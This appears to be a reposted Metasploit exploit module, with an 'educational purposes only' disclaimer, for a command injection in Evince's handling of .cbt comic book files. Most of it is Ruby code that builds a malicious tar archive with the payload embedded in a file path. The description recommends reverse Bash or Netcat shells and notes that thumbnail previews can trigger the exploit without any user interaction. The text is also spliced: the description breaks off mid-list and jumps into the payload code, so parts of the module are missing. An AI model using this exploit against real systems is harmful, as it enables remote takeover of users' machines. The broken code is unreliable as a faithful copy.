Exploits / Vulnerability Discovered : 2019-02-11 |
Type : local |
Platform : linux
This exploit / vulnerability Evince cbt file command injection (metasploit) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rex/zip'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'Evince CBT File Command Injection',
'Description' => %q{
This module exploits a command injection vulnerability in Evince
before version 3.24.1 when opening comic book `.cbt` files.
Some file manager software, such as Nautilus and Atril, may allow
automatic exploitation without user interaction due to thumbnailer
preview functionality.
Note that limited space is available for the payload (<256 bytes).
Reverse Bash and Reverse Netcat payloads should be sufficiently small.
This module has been tested successfully on evince versions:
# Tar archive max path length is 256.
if path.length > 256
fail_with Failure::PayloadFailed, "Payload is too large (#{path.length}): Max path length is 256 characters"
end
# Tar archive max file name length is 100.
path.split('/').each do |fname|
if fname.length > 100
fail_with Failure::PayloadFailed, "File name too long (#{fname.length}): Max filename length is 100 characters"
end
end
# Create malicious tar archive
tarfile = StringIO.new
Rex::Tar::Writer.new tarfile do |tar|
tar.add_file path, 0644 do |io|
io.write ''
end
# Pad file to 1+ MB to trigger tar checkpoint action
tar.add_file rand_text_alphanumeric(10..20), 0644 do |io|
io.write rand_text(1_000_000..1_100_000)
end
end
tarfile.rewind
cbt = tarfile.read
print_status "Writing file: #{datastore['FILENAME']} (#{cbt.length} bytes) ..."
file_create cbt
end
end